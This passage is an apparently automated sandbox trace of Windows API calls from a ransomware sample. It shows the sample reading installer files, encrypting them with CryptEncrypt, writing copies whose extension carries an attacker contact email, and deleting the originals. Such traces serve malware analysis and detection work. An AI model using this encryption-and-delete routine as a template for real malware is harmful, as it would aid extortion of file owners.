lpFileSize=0x37afeb0*=3526) returned 1 [0046.514] CloseHandle (hObject=0x2e4) returned 1 [0046.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 0x80 [0046.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.515] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.515] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.515] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.515] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.516] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71ac0) returned 1 [0046.516] CryptSetKeyParam (hKey=0xf71ac0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.516] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xdc6, lpOverlapped=0x0) returned 1 [0046.519] CryptEncrypt (in: hKey=0xf71ac0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xdd0, dwBufLen=0xdd0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xdd0) returned 1 [0046.519] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xdd0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xdd0, lpOverlapped=0x0) returned 1 [0046.520] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72100) returned 1 [0046.520] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.520] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0046.520] CryptDestroyKey (hKey=0xf72100) returned 1 [0046.520] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0046.520] CryptDestroyKey (hKey=0xf71ac0) returned 1 [0046.520] CloseHandle (hObject=0x2e4) returned 1 [0046.520] CloseHandle (hObject=0x320) returned 1 [0046.521] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1036\\eula.rtf")) returned 1 [0046.521] SetEvent (hEvent=0x2e8) returned 1 [0046.522] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.522] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.522] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=82962) returned 1 [0046.522] CloseHandle (hObject=0x320) returned 1 [0046.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 0x80 [0046.522] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.522] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.522] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.522] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.522] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.522] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71d80) returned 1 [0046.522] CryptSetKeyParam (hKey=0xf71d80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.522] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x14412, lpOverlapped=0x0) returned 1 [0046.675] CryptEncrypt (in: hKey=0xf71d80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x14420, dwBufLen=0x14420 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x14420) returned 1 [0046.676] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x14420, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x14420, lpOverlapped=0x0) returned 1 [0046.678] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72000) returned 1 [0046.678] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.678] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.678] CryptDestroyKey (hKey=0xf72000) returned 1 [0046.678] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.678] CryptDestroyKey (hKey=0xf71d80) returned 1 [0046.678] CloseHandle (hObject=0x320) returned 1 [0046.678] CloseHandle (hObject=0x2e4) returned 1 [0046.680] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1036\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1036\\localizeddata.xml")) returned 1 [0046.681] SetEvent (hEvent=0x2e8) returned 1 [0046.681] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.681] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.682] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=86442) returned 1 [0046.682] CloseHandle (hObject=0x2e4) returned 1 [0046.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 0x80 [0046.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.682] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.682] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.682] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.682] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.682] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0046.682] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.682] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x151aa, lpOverlapped=0x0) returned 1 [0046.684] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x151b0, dwBufLen=0x151b0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x151b0) returned 1 [0046.684] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x151b0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x151b0, lpOverlapped=0x0) returned 1 [0046.686] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71fc0) returned 1 [0046.686] CryptSetKeyParam (hKey=0xf71fc0, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.686] CryptEncrypt (in: hKey=0xf71fc0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.686] CryptDestroyKey (hKey=0xf71fc0) returned 1 [0046.686] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.686] CryptDestroyKey (hKey=0xf72100) returned 1 [0046.686] CloseHandle (hObject=0x2e4) returned 1 [0046.686] CloseHandle (hObject=0x320) returned 1 [0046.688] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1038\\localizeddata.xml")) returned 1 [0046.690] SetEvent (hEvent=0x2e8) returned 1 [0046.690] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.690] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.691] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=18776) returned 1 [0046.691] CloseHandle (hObject=0x320) returned 1 [0046.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 0x80 [0046.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.691] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.691] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.691] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.691] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.691] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72180) returned 1 [0046.691] CryptSetKeyParam (hKey=0xf72180, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.692] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x4958, lpOverlapped=0x0) returned 1 [0046.693] CryptEncrypt (in: hKey=0xf72180, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960, dwBufLen=0x4960 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x4960) returned 1 [0046.693] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x4960, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x4960, lpOverlapped=0x0) returned 1 [0046.694] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0046.694] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.694] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.694] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.694] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.694] CryptDestroyKey (hKey=0xf72180) returned 1 [0046.694] CloseHandle (hObject=0x320) returned 1 [0046.694] CloseHandle (hObject=0x2e4) returned 1 [0046.695] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1038\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1038\\setupresources.dll")) returned 1 [0046.696] SetEvent (hEvent=0x2e8) returned 1 [0046.696] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.696] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.697] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=3643) returned 1 [0046.697] CloseHandle (hObject=0x2e4) returned 1 [0046.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 0x80 [0046.697] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.697] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.697] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.697] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.697] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.699] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf72100) returned 1 [0046.699] CryptSetKeyParam (hKey=0xf72100, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.699] ReadFile (in: hFile=0x2e4, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0xe3b, lpOverlapped=0x0) returned 1 [0046.700] CryptEncrypt (in: hKey=0xf72100, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe40, dwBufLen=0xe40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0xe40) returned 1 [0046.700] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xe40, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xe40, lpOverlapped=0x0) returned 1 [0046.701] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf71b80) returned 1 [0046.701] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.701] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40, dwBufLen=0x40 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x40) returned 1 [0046.701] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.701] WriteFile (in: hFile=0x320, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0xf2, lpOverlapped=0x0) returned 1 [0046.701] CryptDestroyKey (hKey=0xf72100) returned 1 [0046.701] CloseHandle (hObject=0x2e4) returned 1 [0046.701] CloseHandle (hObject=0x320) returned 1 [0046.702] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf")) returned 1 [0046.703] SetEvent (hEvent=0x2e8) returned 1 [0046.703] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.703] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.703] GetFileSizeEx (in: hFile=0x320, lpFileSize=0x37afeb0 | out: lpFileSize=0x37afeb0*=80060) returned 1 [0046.703] CloseHandle (hObject=0x320) returned 1 [0046.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 0x80 [0046.703] GetFileAttributesW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0046.703] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0046.703] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.703] SetFilePointerEx (in: hFile=0x320, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x37afe50 | out: lpNewFilePointer=0x0) returned 1 [0046.703] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0046.704] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afe08, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe64 | out: phKey=0x37afe64*=0xf71b80) returned 1 [0046.704] CryptSetKeyParam (hKey=0xf71b80, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.704] ReadFile (in: hFile=0x320, lpBuffer=0x3b30020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x37afe8c, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesRead=0x37afe8c*=0x138bc, lpOverlapped=0x0) returned 1 [0046.705] CryptEncrypt (in: hKey=0xf71b80, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x138c0, dwBufLen=0x138c0 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x138c0) returned 1 [0046.705] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x138c0, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x138c0, lpOverlapped=0x0) returned 1 [0046.707] CryptImportKey (in: hProv=0xf466e8, pbData=0x37afdfc, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x37afe68 | out: phKey=0x37afe68*=0xf72000) returned 1 [0046.707] CryptSetKeyParam (hKey=0xf72000, dwParam=0x1, pbData=0x37aff18, dwFlags=0x0) returned 1 [0046.707] CryptEncrypt (in: hKey=0xf72000, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50, dwBufLen=0x50 | out: pbData=0x3b30020*, pdwDataLen=0x37afe28*=0x50) returned 1 [0046.707] CryptDestroyKey (hKey=0xf72000) returned 1 [0046.707] WriteFile (in: hFile=0x2e4, lpBuffer=0x3b30020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x37afe70, lpOverlapped=0x0 | out: lpBuffer=0x3b30020*, lpNumberOfBytesWritten=0x37afe70*=0x102, lpOverlapped=0x0) returned 1 [0046.708] CryptDestroyKey (hKey=0xf71b80) returned 1 [0046.708] CloseHandle (hObject=0x320) returned 1 [0046.708] CloseHandle (hObject=0x2e4) returned 1 [0046.709] DeleteFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1040\\localizeddata.xml")) returned 1 [0046.711] SetEvent (hEvent=0x2e8) returned 1 [0046.711] CryptGenRandom (in: hProv=0xf466e8, dwLen=0x10, pbBuffer=0x37aff18 | out: pbBuffer=0x37aff18) returned 1 [0046.711] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1040\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1040\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, 